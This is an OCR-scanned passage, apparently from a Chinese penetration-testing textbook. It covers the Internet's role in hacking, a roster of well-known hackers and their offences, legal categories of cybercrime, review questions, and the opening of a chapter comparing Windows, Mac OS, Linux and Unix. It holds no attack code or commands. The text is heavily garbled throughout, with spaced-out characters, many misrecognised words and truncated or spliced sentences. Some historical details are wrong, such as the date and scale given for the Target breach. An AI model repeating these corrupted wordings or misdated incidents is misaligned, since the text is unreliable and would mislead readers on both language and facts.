比 以 往 任何 时 候 都 更 加 容易 地 广泛 传播 他 们 的 活动 ， 这 对 他 们 形成 了 不 可 抗拒 的 诱惑 。 现 
在 ， 在 2016 年 之 后 的 今天 ， 我 们 比 以 前 任何 时 候 都 有 更 多 (被 入 侵 ) 的 可 能 。Wi-Fi、 蓝 政 、 
平板 电脑 和 智能 手机 以 及 其 他 许多 技术 的 爆炸 式 增 长 进一步 增加 了 混乱 ， 以 及 可 被 黑客 入 
侵 攻 击 的 设备 的 数量 。 随 着 技术 的 发 展 ， 黑 客 也 在 进步 ， 他 们 不 断 增强 的 技术 能 力 和 创造 
力 导 致 攻击 也 在 不 断 进化 。 

由 于 消费 类 产品 并 不 像 注重 产品 功能 那么 重视 安全 ， 因 此 攻击 也 变 得 更 加 容易 。 说 到 
底 ， 通 常 发 布 新 产品 (如 平板 电脑 、PC 或 其 他 产品 ) 的 制造 商 往往 侧重 于 产品 的 功能 ， 而 不 
关注 产品 是 否 安 人 全。 尽管 近 几 年 来 这 种 趋势 可 能 有 所 改变 ， 一 些 供应 商 比 过 去 更 加 注重 产 
品 安全 ， 但 别 高 兴 得 太 早 ， 许 多 产品 在 默认 情况 下 仍然 存在 漏洞 。 


1.3.1 Internet 的 角色 


Internet 同 公众 开放 后 不 入 ， 黑 客 更 加 多 产 ， 也 更 加 危险 。 起 初 在 Internet 上 进行 的 许 
多 攻击 都 是 恶作剧 式 的 ， 如 算 改 网 页 或 类 似 的 行为 。 虽 然 最 初 Internet 上 的 这 些 攻击 本 质 上 
可 能 是 恶作剧 ， 但 后 来 的 攻击 恶劣 程度 要 严重 得 多 。 

事实 上 ，2000 年 以 来 ， 发 生 的 攻击 事件 越 来 越 复 杂 ， 攻 击 性 越 来 越 强 ， 公 开化 程度 也 
越 来 越 高 。 一 个 例子 是 2014 年 8 月 苹果 公司 云 数据 服务 iCloud 的 大 规模 数据 泄露 ， 导 致 数 
百 位 名 人 的 各 种 亲密 照片 被 公之于众 。 遗 憾 的 是 ， 苹 果 公 司 的 客户 条 球 使 得 客户 并 不 能 i 
究 其 数据 泄露 和 其 他 问题 的 责任 。 迄 今 为 止 ， 该 攻击 事件 已 导致 多 起 因 照 片 被 次 而 提起 的 
诉讼 ， 同 时 也 给 苹果 公司 带 来 了 大 量 负面 公众 影响 。 由 于 数据 泄露 而 被 盗 的 照片 现在 可 在 
Internet 上 随意 找到 ， 并 且 以 野火 粹 原 之 势 传播 ， 这 给 照片 上 的 人 带 来 了 极 大 的 困扰 。 

恶意 黑客 造成 损害 的 另 一 个 例子 是 发 生 在 2014 年 9 月 的 塔 吉 特 公司 数据 泄露 事件 。 该 
事件 造成 约 5600 万 个 信用 卡 账户 泄露 。 这 一 数据 外 泄 事件 距 上 一 次 广为人知 的 塔 吉 特 公司 
数据 泄露 事件 还 不 到 一 年 时 间 ， 而 上 次 事件 导致 4000 万 客户 账户 的 泄露 。 

最 后 一 个 例子 来 自 美国 政府 于 2016 年 3 月 提供 的 信息 。 据 透露 ， 截 至 2015 年 3 月 的 18 
个 月 期 间 ， 已 经 报告 了 对 奥巴马 医改 网 站 316 个 不 同 严重 程度 的 网 络 安全 事件 。 数 以 百 万 
计 的 美国 人 使 用 该 网 站 搜索 和 获取 医疗 保健 信息 ， 除 了 12 个 州 和 华盛顿 特区 外 的 所 有 地 区 
都 使 用 它 。 虽 然 对 这 些 事件 的 全 面 分 析 表 明 尚 未 泄露 任何 个 人 信息 ， 如 社保 账号 或 家 庭 住 
址 ， 但 它 确实 表明 该 网 站 可 能 被 视 为 贸 取 此 类 信息 的 有 效 目 标 。 令 人 有 些 担忧 的 是 ， 事 实 


上 (该 网 站 ) 现 在 还 存在 着 许多 其 他 严重 的 安全 问题 ， 如 未 打 补 丁 的 系统 和 集成 度 不 佳 的 系 
统 等 (容易 被 黑客 利用 )。 

所 有 这 些 攻击 都 是 正在 发 生 的 并 且 对 公众 造成 伤害 的 恶意 攻击 的 例子 。 

许多 因素 促成 了 黑客 和 网 络 犯 罪 的 增加 ， 其 中 Internet 上 可 用 的 海量 数据 以 及 新 技术 
和 数码 产品 的 扩散 是 两 大 首要 原因 。 上 自 2000 年 以 来 ， 越 来 越 多 的 便携 式 设备 出 现在 市 场 
上 ， 且 功能 和 性 能 均 稳 步 增长 。 智能 手机 、 平 板 电 脑 以 及 可 罕 戴 计算 和 类 似 产 品 已 经 变 
得 高 度 开 放 ， 易 于 联网 ， 可 让 人 们 轻松 共享 信息 。 此 外 ， 请 注意 可 连接 Imternet 设 备 的 巨 
大 数量 ， 例 如 智能 手机 、 平 板 电脑 和 其 他 随身 携带 的 数码 产品 数量 。 上 述 所 有 例子 都 引 
起 了 犯 徘 分 子 的 关注 ， 其 中 许多 人 有 着 伪 取 金 钱 、 数 据 和 其 他 资源 的 动机 。 

许多 发 生 在 过 去 十 几 年 中 的 攻击 已 不 再 由 以 往 那 类 好 奇 黑客 发 动 ， 而 是 其 他 群体 。 涉 
及 其 中 的 群体 包括 那些 有 政治 动机 的 团体 、 激 进 组 织 和 罪犯 。 虽 然 很 多 网 络 攻击 仍然 由 好 
奇 者 或 恶作剧 人 士 发 动 ， 但 是 这 些 更 具 恶 意 动 机 的 攻击 往往 更 易 被 曝光 并 产生 极 大 影响 。 


1.3.2 黑客 名 人 晤 (或 耻辱 柱 ) 


许多 黑客 和 徘 犯 选 择 隐 藏 在 假名 之 后 ， 在 很 多 案件 中 ， 他 们 一 直道 遥 法 外 ， 但 这 并 不 

意味 着 没有 一 些 知 名 的 黑客 人 物 和 事件 。 下 面 是 一 些 历史 上 著名 的 黑客 : 

@ 1988 年 ， 康 奈 尔 大 学 的 学 生 Robert T. Morris, 开 制 作 了 被 认为 是 首 个 Interet 旺 虫 的 
病毒 。 由 于 对 蠕虫 设计 的 疏忽 ， 该 病毒 进行 了 极 快 的 无 差别 复制 ， 导 致 广泛 的 速 
度 下 降 ， 影 响 了 整个 Internet。 

@ 1994 年 ，Kevin Lee Poulsen 使 用 假名 “黑暗 但 本 (Dark Dante)” 接 管 了 位 于 洛杉矶 
的 KIIS-FM 广 播 电台 的 所 有 电话 线路 ， 以 确保 他 成 为 第 102 位 来 电 者 ， 诛 得 一 辆 保 
时 捷 944 S2 跑 车 。Poulsen 在 出 狱 后 由 于 成 为 第 一 个 被 禁止 使 用 Internet 的 人 而 声名 
鹊起 (尽管 该 禁令 只 是 一 个 有 期 处 神 )。 该 事件 的 一 个 花絮 是 ，Poulsen 现 在 是 美国 

《 连 线 》 杂 志 的 编辑 。 

@ 1999 年 ，David L. Smith 制 造 了 “ 梅 利 莎 (Melissa)” 病 毒 ， 该 病毒 设计 为 通过 发 送 
电子 邮件 入 侵 用 户 地 址 籍 ， 而 后 删除 受 感染 系统 上 的 文件 。 

@ 2001 年 ，Jan de Wit 制 造 了 以 网 坛 美女 库 尔 尼 科 娃 (Anna Kournikova) 命 名 的 病毒 ， 
该 病毒 设计 为 读 取 用 户 Outlook 软 件 (微软 办 公 套 件 之 一 ， 主 要 用 来 收发 邮件 ) 通 讯 
录 的 所 有 条 目 ， 并 将 自身 发 送 到 通讯 录 的 每 个 邮箱 中 。 

@ 2002 年 ，Gary McKinnon 接 入 了 美国 军用 网 络 ， 并 删除 了 其 中 的 关键 文件 ， 包 括 有 
天 武器 和 其 他 系统 的 信息 。 

@ 2004 年 ，Adam Botby1l 和 两 位 朋友 共 谋 ， 熏 取 了 苑 氏 (Lowe's) 工 具 连 锁 店 的 信用 卡 
信息 。 

@ 2005 年 ，Cameron Lacroix 入 侵 了 大 名 易 易 的 由 丽 斯 。 和 希尔顿 (Paris Hilton) 的 电话 ， 
并 参与 对 律 商 联 讯 (LexisNexis， 世界 知名 法 律 服务 提供 商 ) 网 站 的 攻击 ， 该 网 站 是 


一 个 在 线 公 共 记 录 聚 合 器 ， 最 终 导 致 数 干 条 个 人 信息 记录 泄露 。 
@ 2009 年 ， 俄 罗斯 年 轻 的 黑客 Kristina Vladimirovna Svechinskaya 参 与 了 几 起 诈骗 美 
国 和 英国 一 些 大 型 银行 的 事件 。 她 使 用 特洛伊 木马 进行 攻击 ， 在 美国 银行 (Bank of 
America) 开 设 了 数 干 个 银行 账户 ， 通 过 这 些 银行 账户 ， 她 总 共 可 诈骗 30 亿 美元 。 
该 事件 中 一 个 有 趣 的 花絮 是 ，Svechinskaya 女 士 因为 她 的 美貌 而 被 评 为 世界 上 最 性 
感 黑客 。 提 到 这 一 点 ， 是 要 说 明 一 个 事实 ， 即 那 种 生活 在 地 下 室 的 社交 困难 或 一 
副 书 采 子 相 的 黑客 形象 已 一 去 不 复 运 了 。 在 本 案 中 ， 这 位 黑客 不 仅 技 能 熟练 和 人 危 
险 ， 而 且 并 不 符合 对 于 黑客 外 貌 的 那 种 刻板 印象 。 
@ 2010 年 至 今 ， 黑 客 组 织 “ 匿 名 者 (Anonymous)” 攻 击 了 多 个 目标 ， 包 括 地 方 政府 网 
络 和 新 闻 机 构 等 。 直 到 今天 ， 该 组 织 依然 活跃 并 进行 了 数 次 高 调 的 攻击 。 他 们 曾 
将 唐纳德 。 特 朗 普 (Donald Trump) 和 他 的 2016 年 总 统 竞 选 活动 列 为 攻击 目标 。 
尽管 许多 攻击 与 实施 这 些 攻 击 的 黑客 使 得 新 闻 在 茶 种 程度 上 形成 了 一 些 定式 或 形式 ， 
但 还 有 许多 并 非 如 此 。 事 实 上 ， 许 多 高 价值 、 复 杂 和 人 危险 的 攻击 经 常 发 生 ， 但 从 未 被 报 
道 ， 更 糟 的 是 有 的 甚至 未 被 发 现 。 在 被 发 现 的 攻击 中 ， 只 有 少数 黑客 会 受审 ， 银 销 入 狱 的 
更 是 少 之 又 少 。 但 是 ， 无 论 是 否 被 抓 住 ， 黑 客 攻 击 始 终 是 一 种 犯罪 行为 ， 在 一 个 不 断 发 展 
的 法 律 体系 中 将 会 被 起 诉 。 


1.3.3 ”法 律 如 何 分 类 黑客 行为 


在 过 去 二 十 年 中 ， 与 黑客 有 关 的 犯 菲 行为 发 生 了 巨大 的 变化 ， 下 文 列 出 了 网 络 犯罪 的 


盗用 身份 信息 

这 是 指 饮 取 身份 信息 ， 从 而 使 得 茶 人 可 以 冒 用 另 一 方 身 份 达 到 非法 目的 。 通 划 ， 这 种 
类 型 的 活动 是 为 了 获得 经 济 利 益 而 进行 的 ， 例 如 开 立 信用 卡 或 银行 账户 ; 或 者 在 极端 情况 
下 进行 其 他 犯罪 ,例如 获得 租赁 资产 或 其 他 服务 。 


盗用 服务 

这 包括 未 经 正式 或 口头 许可 使 用 电话 、Internet 或 其 他 类 似 的 服务 。 属 于 此 类 别 犯 罪行 
为 的 例子 一 般 是 窃取 密码 和 利用 系统 漏洞 的 行为 。 有 趣 的 是 ， 在 某 些 情况 下 ， 仪 仪 是 穷 取 
密码 等 的 行为 就 足以 构成 犯罪 。 在 某 些 州 ， 与 朋友 和 家 人 分 享 Netflix( 著 名 在 线 影视 服务 ) 
等 服务 账户 可 能 被 视 为 盗用 服务 而 被 起 诉 。 


网 络 入 侵 或 未 经 授权 访问 

这 是 最 古老 和 第 见 的 攻击 类 型 之 一 。 以 这 种 类 型 的 攻击 为 先导 的 其 他 攻击 (例如 身份 
信息 盗用 、 盗 用 服务 以 及 其 他 无 数 种 可 能 性 ) 并 非 闻所未闻 。 在 理论 上 ， 任 何 一 次 未 经 授 
权 的 网 络 访问 都 足以 被 认为 是 网 络 入 侵 ， 这 包括 使 用 Wi-EFi 网 络 或 甚至 未 经 许可 登录 一 个 


来 性 账户。 


发 布 和 /或 传播 非法 材料 
在 过 去 十 年 中 ， 这 是 一 个 难以 解决 


0 处 理 的 问题 。 被 认定 为 非法 分 发 的 材料 包括 受 版 
权 保护 的 材料 、 盗 版 软件 和 儿童 色情 内 容 等 。 相 关 技 术 (如 加 密 、 文 件 共享 服务 和 保持 匿 
名 等 方式 ) 的 易于 获得 使 得 这 些 活动 屡禁不止。 


欺诈 
这 是 一 种 使 用 非法 信息 或 非法 访问 来 欺骗 另外 一 方 或 多 方 的 行为 ， 目 的 往往 是 获取 经 
济 利益 或 造成 损害 。 
侵占 


这 是 一 种 金融 诈骗 形式 ， 涉 及 盗用 或 挪用 资金 ， 是 违反 重要 职位 信用 的 结果 。 通 过 使 
用 现代 技术 ， 这 项 任务 变 得 更 加 容易 。 


垃圾 收集 

这 是 最 古老 、 最 简单 的 方法 ， 即 获取 和 收集 已 丢弃 或 留 在 不 安全 或 无 保护 容器 中 的 材 
料 。 技 弃 的 数据 往往 可 以 拼接 到 一 起 ， 重 建 敏感 信息 。 虽 人 然 翻 找 垃圾 本 身 并 不 违法 ， 但 翻 
找 私 有 物业 的 垃圾 却 构成 犯罪 ,可 以 以 入 侵犯 罪 或 其 他 相关 罪名 起 诉 。 


编写 恶意 代码 
这 是 指 病毒 、 蠕 虫 、 间 谍 软 件 、 广 告 软件 、rootkit 或 其 他 类 型 的 恶意 软件 。 基 本 上 而 
言 ， 这 类 犯罪 包含 一 类 故意 编写 用 以 造成 破坏 或 中 断 的 软件 。 


未 经 授权 销毁 或 更 改 信息 
这 包括 在 未 获取 适当 权限 的 情况 下 修改 、 销 毁 或 自 改 信息 。 


拒绝 服务 (DoS) 和 分 布 式 拒绝 服务 (DDoS) 攻 击 

这 两 种 攻击 方式 都 是 使 系统 资源 超 负 和 荷 ， 以 致 无 法 回合 法 用 户 提供 所 需 的 服务 。 虽 然 
目标 相同 ， 但 DoS 和 DDoS 两 个 术语 实际 上 描述 了 两 种 不 同形 式 的 攻击 。DoS 攻 击 是 小 规模 
的 一 对 一 的 攻击 ; 而 DDoS 攻 击 规模 更 大 ， 其 中 成 干 上 万 的 系统 攻击 同一 目标 。 


网 络 跟踪 

这 是 在 此 列举 的 犯罪 行为 中 相对 较 新 的 一 种 。 这 种 犯罪 的 攻击 者 使 用 在 线 资 源 或 其 他 
手段 来 收集 个 人 相关 信息 ， 并 使 用 它 来 跟踪 该 人 ;同时 在 茶 些 情况 下 ， 试 图 在 现实 生活 中 
接触 目标 。 虽 然 一 些 州 (如 加 利 福 尼 亚 ) 已 经 制定 了 针对 网 络 骚 扰 犯 罪行 为 的 法 律 ， 但 这 关 
立法 远 不 普 明 。 在 许多 情况 下 ， 由 于 骚扰 者 在 实施 犯罪 期 间 穿越 了 州 界 ， 哪 个 州 或 官 辖 范 
围 可 以 起 诉 成 为 一 个 问题 。 


网 络 欺凌 

这 种 行为 与 网 络 跟踪 非常 类 似 ， 区 别 是 在 该 行为 中 ， 个 人 使 用 社交 媒体 和 其 他 技术 等 
手段 来 骚扰 受害 者 。 虽 然 此 类 行为 可 能 看 起 来 不 算 什么 大 事 ， 但 据 称 它 已 导致 一 些 人 因 补 
欺凌 而 自杀 。 


网 络 恐 怖 主义 

遗憾 的 是 ， 当 今世 界 的 一 个 现实 是 ， 敌 对 方 已 经 意识 到 ， 传 统 武器 无 法 给 予 他 们 像 发 
动 网 络 空 间 战 那 样 的 力量 。 与 被 派 往 目 标 国 家 相 比 ， 通 过 网 络 空 间 从 事 恐 怖 主义 行为 所 冒 
的 真实 风险 是 微不足道 的 。 

为 了 帮助 了 解 网 络 犯罪 的 本 质 ， 首 先 要 了 解 犯罪 行为 必 有 的 三 个 核心 要 件 ， 它 们 分 
别 是 : 

@ 实现 目标 或 目的 的 手段 或 能 力 ， 这 本 质 上 意味 着 具备 完成 工作 所 需 的 技能 和 能 力 。 

@ 动机 ， 即 追求 既定 目标 的 原因 。 

@ 机 会 ， 即 给 定时 间 内 落实 威胁 所 需 的 空缺 或 弱点 。 

正如 将 在 本 书 中 探讨 的 ， 这 些 攻击 类 型 中 的 许多 种 类 开始 时 非常 简单 ， 但 迅速 发 展 出 
越 来 越 多 先进 的 形式 。 攻 击 者 迅速 地 升级 了 攻击 方法 并 采用 更 为 先进 的 战略 ， 使 得 攻击 比 
以 往 更 加 有 效 。 由 于 他 们 已 经 知道 如 何 骚 扰 和 激怒 公众 ， 通 过 将 现代 这 种 “互联 ”的 生活 
方式 作为 目标 ， 他 们 也 对 当今 世界 带 来 了 更 大 的 破坏 。 

随 着 智能 手机 和 社交 网 络 等 新 技术 更 加 融入 日 常生 活 ， 本 书 提 到 的 攻击 只 会 不 断 增 
长 。 通 过 这 些 设备 和 技术 收集 、 跟 踪 和 处 理 的 信息 量 大 得 惊人 。 据 某 些 信息 源 估计 ， 每 隔 
三 分 钟 就 会 从 大 多 数 人 身上 收集 有 关 定 位 、 应 用 程序 使 用 、 网 页 浏览 和 其 他 数据 的 信息 。 
有 着 如 此 之 大 信息 量 的 收集 ， 很 容易 想象 出 可 能 发 生 的 信息 滥用 场景 。 

过 去 十 多 年 来 ， 大 量 攻击 的 背后 都 由 仿 欲 驱使 。 黑 客 们 已 经 意识 到 ， 他 们 的 技能 现在 
不 仅仅 可 以 满足 好 奇 ， 也 可 以 用 来 获得 经 济 利益 。 常 见 的 例子 之 一 是 在 这 段 时 间 内 出 现 的 
恶意 软件 。 恶 意 软 件 不 仅 可 以 感染 系统 ， 而 且 在 许多 情况 下 也 可 以 为 其 制作 者 带 来 收益 。 
例如 ， 恶 意 软件 可 以 将 用 户 的 浏览 器 重 定向 到 指定 网 站 ， 目 的 是 让 用 户 点 击 或 浏览 广告 。 


1.4 本 重 小 结 


本 章 介 绍 了 渗透 测试 者 是 通过 使 用 与 恶意 黑客 相同 的 技术 来 调查 、 评 估 和 测试 给 定 组 
织 安全 性 的 人 。 他 们 的 “对 手 ” 是 脚本 小 子 、 白 帽 黑 客 、 灰 帽 黑客 、 黑 帽 黑 客 和 网 络 恐 怖 
分 子 。 渗 透 测 试 的 工作 是 试图 破坏 客户 的 机 密 性 、 完 整 性 和 可 用 性 。 

此 外 ， 还 介绍 了 黑客 和 渗透 测试 的 演化 过 程 ， 包 括 Intemet 在 其 中 扮演 的 角色 和 历史 上 
的 著名 黑客 。 


10 DUNS 


1. 一 家 公司 可 以 使 用 哪 三 种 类 型 的 安全 控制 措施 来 防御 黑客 ? 
2. 黑客 与 渗透 测试 者 之 间 主 要 有 何 区 别 ? 

3. 渗透 测试 者 都 有 何 别 称 ? 

4. 在 讨论 信息 安全 时 ，CIA 三 要 素 代表 什么 ? 

5. 列举 一 些 网 络 犯 罪 的 类 别 。 


操作 系统 与 网 络 简介 


本 章 将 介绍 渗透 测试 工作 中 可 能 中 到 的 主要 操作 系统 。 它 们 包括 微软 Windows、Mac 
OS、Linux 以 及 Unix。 此 外 ， 还 将 介绍 一 些 网 络 基 础 知识 ,包括 计算 机 类 型 和 网 络 规模 
等 。 当 分 析 客 户 的 网 络 时 ， 需 要 用 到 这 些 知识 。 最 后 ， 不 讨论 OSI 模型 和 TCP/IP 协 议 的 网 
络 介绍 是 不 完整 的 (因此 本 书 也 将 介绍 它们 )。 


本 章 将 学 习 : 
外 操作 系统 对 比 


2.1 常见 操作 系统 对 比 


操作 系统 (Operating System，OS) 具 备 繁 多 的 不 同 功能 ， 但 是 抽 离 所 有 的 花哨 术语 和 特 
性 后 ， 就 能 认识 到 操作 系统 是 执行 其 他 应 用 程序 的 平台 。 没 有 操作 系统 ， 计 算 机 本 质 上 不 
过 是 等 待 使 用 的 一 堆 电 路 和 线 绕 。 操 作 系 统 负 责 从 运行 应 用 程序 和 提供 网 络 访 问 到 管理 文 
件 和 管理 存储 设备 的 一 切 工作 。 

现代 操作 系统 则 具有 更 多 的 功能 ， 例 如 监视 用 户 、 管 理 设 备 以 及 提供 光鲜 亮丽 界面 的 
能 力 。 另 外 ， 操 作 系 统 应 提供 一 种 防止 未 授权 访问 资源 (如 文件 、 文 件 夹 或 者 硬件 和 网 络 
资源 ) 的 机 制 。 

每 个 操作 系统 都 提供 了 众多 功能 ， 这 使 其 区 别 于 其 他 操作 系统 。 然 而 ， 许 多 功能 往往 
是 共通 的 ， 例 如 : 


图 形 用 户 表 面 

当今 大 多 数 操作 系统 均 提 供 了 一 个 图 形 用 户 界 面 (GUD)， 人 该 界面 可 以 快速 方便 地 
访问 系统 上 的 各 种 功能 和 应 用 程序 ， 而 无 须知 道 如 何 使 用 命令 行 。 在 图 形 界 面 中 ， 功 能 由 
图 标 表 示 ， 操 作 通 过 菜单 和 按钮 进行 。 


网 络 文 持 
除 一 些 特例 外 ， 现 代 操 作 系 统 均 提供 网 络 连接 能 力 ， 无 论 该 网 络 是 有 线 、 无 线 、 监 下 
还 是 3G/4G。 不 提供 此 类 访问 功能 的 系统 往往 是 遗留 系统 或 特殊 定制 系统 。 
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多 任务 处 理 
同时 运行 多 个 应 用 程序 的 功能 是 任何 现代 操作 系统 所 应 有 的 。 这 意味 看 操作 系统 可 以 
无 颖 地 同时 执行 多 个 应 用 程序 ， 从 而 有 助 于 提高 环境 运行 效率 。 


应 用 程序 支持 
操作 系统 应 支持 多 种 类 型 的 应 用 程序 ， 并 作为 这 些 程序 ; 
统 负责 管理 和 分 配 应 用 程序 在 运行 时 所 需要 和 共享 的 资源 。 


硬件 接口 

任何 现代 操作 系统 均 提供 应 用 程序 、 用 户 和 硬件 之 间 的 接口 。 操 作 系统 掩盖 了 硬件 的 
细节 ， 并 使 用 户 得 以 在 无 须 考 虑 硬件 细节 的 环境 中 工作 。 此 外 ， 通 过 使 用 被 称 为 驱动 程序 
的 专用 软件 ， 操 作 系统 与 硬件 进行 交互 并 允许 应 用 程序 与 硬件 交互 。 

本 书 将 在 后 面 进一步 讨论 操作 系统 ， 因 为 它们 涉及 扫描 和 枚 举 ， 在 此 将 对 照 和 比较 不 
同 的 操作 系统 。 


行 的 基础 。 事 实 上， 操作 系 


2.1.1 微软 Windows 


很 可 能 你 所 遇 到 的 大 多 数 系统 都 以 某 种 形式 运行 微软 的 Windows 平 台 。 自 20 世 纪 80 年 

代 推 出 该 操作 系统 以 来 ， 它 已 逐渐 占领 了 工作 场所 和 家 庭 中 的 大 多 数 台 式 机 和 服务 器 ， 并 

登 上 了 移动 设备 (如 平板 电脑 和 智能 手机 )。 自 2009 年 以 来 ， 微 软 已 经 相当 稳定 地 占有 全 球 

约 90% 的 计算 机 操作 系统 份额 。 正 是 由 于 这 种 统治 级 地 位 ， 因 此 我 们 必须 熟悉 (甚至 更 熟 

悉 ) 这 个 操作 系统 。Windows 果 面 如 图 2.1 所 示 。 
ES = 


图 2.1] Windows 果 面 
微软 的 市 场 统 治 地 位 使 其 成 为 一 个 巨大 目标 ， 因 此 Windows 操 作 系 统 被 攻击 的 频率 也 
远 高 于 其 他 操作 系统 。 以 下 是 Windows 系 统 遇 到 的 一 些 常见 问题 : 


无 尽 的 更 新 
微软 不 断 为 其 操作 系统 编译 并 分 发 补丁 和 服务 包 ， 以 改进 其 功能 并 修补 安全 问题 。 但 
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这 并 不 一 定 意 味 看 在 最 需要 这 些 补 丁 的 系统 上 安装 了 和 它们。 另外， 虽然 看 似 奇 怪 ， 但 不 断 
更 新 本 里 就 成 为 一 个 弱点 ， 因 为 它 是 保守 的 ， 其 中 一 些 补 丁 没有 进行 长 期 测试 ， 除 了 它们 
要 修补 的 目标 漏洞 之 外 ， 实 际 上 它们 最 终 会 创造 更 多 漏洞 。 


默认 配置 

大 多 数 安装 采用 了 默认 配置 换言之， 除了 基本 安装 以 外 ， 它 们 没有 以 任何 特定 方式 
进行 加 固 。 事 实 上 ， 典 型 用 户 可 能 从 未 使 用 本 可 用 于 更 安全 地 保护 系统 的 安全 功能 和 其 他 
项 目 。 对 于 Windows 这 类 系统 而 言 ， 默 认 配置 安全 未 达 其 应 有 水 平 ， 因 此 用 户 和 系统 管理 
员 应 将 安全 性 提高 到 更 可 接受 的 水 平 。 


旧版 本 的 Windows 现 在 并 不 罕见 ， 在 某 些 情况 下 ， 这 意味 着 会 发 现 仍 在 运行 的 
Windows 95 或 更 早 版 本 的 系统 。 虽 然 最 终 用 户 可 能 更 喜欢 熟悉 的 操作 系统 ， 束 像 他 们 喜欢 
拥有 一 双 虽 旧 但 “和 舒适 ”的 鞋 一 样 ， 但 这 对 于 关注 安全 的 人 来 说 ， 融 是 一 场 墨 梦 。 遗 留 系 
统 可 能 意味 着 没有 任何 文 持 ， 因 为 微软 (和 许多 其 他 软件 供应 商 ) 在 一 段 时 间 后 就 会 停止 文 
持 旧 版 本 的 软件 。 


2.1.2 Mac OS 


这 种 苹果 公司 专 有 的 操作 系统 在 短 短 几 年 前 还 并 没有 这 么 流行 ， 但 现在 它 已 经 在 工作 
场所 和 家 许 中 蔡 代 了 许多 Windows 系 统 。 在 许多 工作 场所 ，Windows 和 Mac 操 作 系 统 在 组 
织 内 共存 。iPad 和 iPhone 的 广泛 使 用 使 得 Mac OS 更 为 常见 。Mac OS 加 面 如 图 2.2 所 示 。 
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从 安全 方面 考虑 ，Mac OS 存在 以 下 问题 : 


应 用 支持 

Mac OS 具 有 大 量 且 不 断 增 长 的 应 用 程序 支持 基础 ， 但 在 安全 工具 方面 ， 与 本 章 提 到 
的 其 他 操作 系统 相 比 ， 它 是 相对 缺乏 的 。 这 是 因为 苹果 公司 通过 其 应 用 商店 (App Store) 控 
制 了 允许 安装 哪些 软件 。 


用 户 的 天 真 想 法 

Mac OS 的 忠实 用 户 仍 然 存在 这 样 一 种 感觉 。Mac OS 不 存在 漏洞 。 许 多 人 认为 它们 不 
会 像 Windows 用 户 所 遇 到 的 那样 易 受 病毒 、 恶 意 软件 、 黑 客 攻击 或 其 他 形式 的 攻击 。 这 种 
思维 方式 是 非常 普遍 的 ， 许 多 企业 甚至 没有 为 可 能 迁移 到 工作 场所 的 Mac 系 统制 定安 全 
策略 。 

功能 

Mac OS 上 自 带 了 丰富 的 功能 ， 这 种 对 大 多 数 人 而 言 的 优秀 表现 却 为 那些 想 要 作恶 的 人 
提供 了 巨大 的 攻击 面 。 诸 如 802.11 无 线 和 蓝牙 连接 的 功能 都 是 默认 安装 的 标准 配置 ， 它 们 
都 成 了 潜在 的 攻击 入 口 。 


2.1.3 LImUX 


Linux 是 你 将 在 渗透 测试 职业 生涯 中 熟悉 的 一 种 操作 系统 。Linux 通 常 被 视 为 一 种 为 所 
谓 的 “电脑 宅男 ”设计 的 令 人 困惑 的 操作 系统 。 虽 然 对 于 某 些 发 行 版 这 一 评价 可 谓 名 副 其 
实 ， 但 这 并 非 放 之 四 海 而 皆 准 。 在 许多 情况 下 ，Linux 确 实 需要 更 多 的 知识 ， 但 在 某 些 情 
况 下 ， 普 通用 户 也 可 以 将 其 作为 桌面 操作 系统 使 用 。 作 为 渗透 测试 人 员 ， 将 经 常 遇 到 作为 
服务 器 操作 系统 的 Linux， 还 会 将 其 作为 运行 测试 工具 的 时 面 操作 系统 使 用 。Ubuntu Linux 
系统 桌面 如 图 2.3 所 示 。 


23 Ubuntu Linux 系 统 桌面 
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Linux 最 大 的 缺点 是 ， 它 通 第 要 求 用 户 能 够 目 己 进行 一 些 其 他 操作 系统 已 代 他 们 完成 
的 基础 操作 。 


最 低 权 限 

该 操作 系统 已 经 很 好 地 将 官 理 任务 与 用 户 账 户 分 离开 来 。 换 句 话 说 ，Linux 用 户 通 利 
不 会 在 管理 账户 (也 就 是 超级 用 户 或 root 用 户 ) 下 运行 。 实 质 上 ， 通 过 这 些 功能 分 离 ， 极 大 
降低 了 系统 风险 。 


开 产 
Linux 开 源 社区 努力 工作 ， 以 解决 Linux 的 不 同 版 本 中 哪怕 是 极其 微小 的 问题 ， 但 开源 
也 意味 看 存在 男 一 个 问题 ， 它 是 开放 的 。 所 有 人 部 可 接触 并 通晓 其 源 代码 。 


灵活 性 

该 操作 系统 可 以 调整 为 无 数 种 的 配置 ， 从 而 具有 极 大 的 灵活 性 和 适应 性 。 实 际 上 有 者 
各 种 各 样 用 途 的 Linux 版 本 ， 包 括 用 于 防火 墙 、 果 面 、 渗 透 测 试 和 取证 等 的 发 行 版 。 

值得 注意 的 是 ， 许 多 设备 中 也 内 置 了 Linux 操 作 系 统 ， 如 路 由 器 、 防 火 墙 、 平 板 电 脑 
和 包括 智能 手机 在 内 的 其 他 设备 。Linux 实 际 上 比 你 意识 到 的 更 常见 。 


2.1.4 UNIx 


Unix 是 你 可 能 遇 到 的 一 堆 操 作 系 统 中 季 和 他 辈 的 。Unix 有 着 可 追 湖 到 20 世 纪 60 年 代 的 修 
久 历 史 ， 但 今天 仍然 很 受 欢迎 。Unix 往 往 用 于 服务 器 上 ， 人 台式 机 上 也 有 少量 的 部 署 。Unix 
系统 桌面 如 图 2.4 所 示 。 
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图 2.4 ”Unix 系统 桌面 
以 下 是 有 关 Unix 一 些 应 记 住 的 事项 : 


学 习 曲 线 
与 其 他 操作 系统 相 比 ，Unix 学 习 曲 线 更 为 陡峭 ， 并 且 对 于 茶 些 人 来 说 可 能 证 怪 而 难以 适应 。 
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Unix 有 广泛 的 技术 文 持 ， 但 组 织 的 技术 支持 部 门 可 能 无 法 对 其 提供 良好 文 持 ， 这 可 能 
导致 错误 配置 (或 其 他 更 粮 

应 用 支持 

Unix 已 经 经 过 长 时 间 的 使 用 ， 因 此 拥有 一 个 无 与 伦比 的 庞大 应 用 程序 和 脚本 库 。 

Mac OS 渊 源 的 很 大 一 部 分 可 追 斋 到 Unix 操 作 系统 。 因 此 ， 具 有 Unix 操 作 系 统 经 验 的 
用 户 使 用 该 系统 时 ，( 与 普通 用 户 相 比 ) 将 具备 执行 更 为 高 级 操作 的 能 力 。 

总 而 言 之 ， 以 上 介绍 的 这 几 球 市 场 上 的 操作 系统 是 渗透 测试 中 可 能 遇 到 的 。 至 于 遇 到 
哪些 将 根据 环境 而 有 很 大 的 不 同 ， 但 最 有 可 能 的 会 是 Windows 和 某 些 版 本 的 Linux。 会 遇 
到 Windows 是 因为 许多 蝎 面 和 服务 器 使 用 它 。 另 外 ， 也 将 遇 到 Linux， 因 为 它 不 仅 在 众多 
